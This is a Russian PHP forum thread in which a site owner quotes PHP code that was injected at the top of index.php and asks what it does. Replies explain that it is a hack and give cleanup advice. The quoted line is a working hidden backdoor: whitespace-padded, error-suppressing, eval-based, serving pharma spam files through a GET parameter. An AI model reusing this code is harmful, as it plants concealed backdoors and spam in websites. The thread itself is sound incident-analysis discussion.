PHP.SU

Программирование на PHP, MySQL и другие веб-технологии
PHP.SU Портал     На главную страницу форума Главная     Помощь Помощь     Поиск Поиск     Поиск Яндекс Поиск Яндекс     Вакансии  Пользователи Пользователи


 Страниц (1): [1]   

> Описание: В самом начале index.php посторонний код
Alexej
Отправлено: 14 Февраля, 2021 - 20:30:41
Post Id


Новичок


Покинул форум
Сообщений всего: 1
Дата рег-ции: Февр. 2021  


Помог: 0 раз(а)




Доброго времени суток.
Вот это появилось в начале index.php.
PHP:
скопировать код в буфер обмена
  1. <?                                                                                                                                                                                                                   error_reporting(0); ini_set('display_errors', 'Off'); if(isset($_GET['bo'])) { header('Content-Type: text/html; charset=utf-8'); $p=array_pop(@preg_split("!\/!",$_GET['bo'])); echo eval/**/('?>'.join("",file("css/main/bon/$p")).'<?'); die; }?>

А в этот самый css/main/bon/ свалилась куча PHP с одержанием на фарм-тему.
А нормальный без этого переименован в index.1.php.
Что за код? Какие-нибудь подробности?
Заранее спасибо.
 
 Top
LML
Отправлено: 15 Февраля, 2021 - 10:45:46
Post Id



Новичок


Покинул форум
Сообщений всего: 7
Дата рег-ции: Февр. 2021  


Помог: 0 раз(а)




Сайт взломан не "вроде", а однозначно.

По коду:
1. Отключено отображение ошибок, чтобы сложнее было отследить, если встроенный код заглючит.
2. По запросу в адресной строке типа http://ваш.сайт/?bo=boom, происходит подмена на http://ваш.сайт/css/main/bon/boom.
3. После вывода содержимого, дальнейшая загрузка страницы прекращается.
 
 Top
Vladimir Kheifets
Отправлено: 15 Февраля, 2021 - 15:56:22
Post Id



Частый посетитель


Покинул форум
Сообщений всего: 620
Дата рег-ции: Март 2017  
Откуда: Германия, Бавария


Помог: 29 раз(а)




Alexej пишет:
Вот это появилось в начале index.php...

Добрый день!
Если что-то неожиданно появляется, советую срочно поменять все пароли и некому их показывать.
Затем проверить дату и время модификации файла на сервере,
проверить в ftp-logs oткуда был заход и восстановить запорченный файл.
Можете ещё пожаловаться в abuse.
Удачи!

(Отредактировано автором: 15 Февраля, 2021 - 15:58:22)

 
 Top
Страниц (1): [1]
Сейчас эту тему просматривают: 1 (гостей: 1, зарегистрированных: 0)
« Вопросы новичков »


Все гости форума могут просматривать этот раздел.
Только зарегистрированные пользователи могут создавать новые темы в этом разделе.
Только зарегистрированные пользователи могут отвечать на сообщения в этом разделе.
 



Powered by PHP  Powered By MySQL  Powered by Nginx  Valid CSS  RSS

 
Powered by ExBB FM 1.0 RC1. InvisionExBB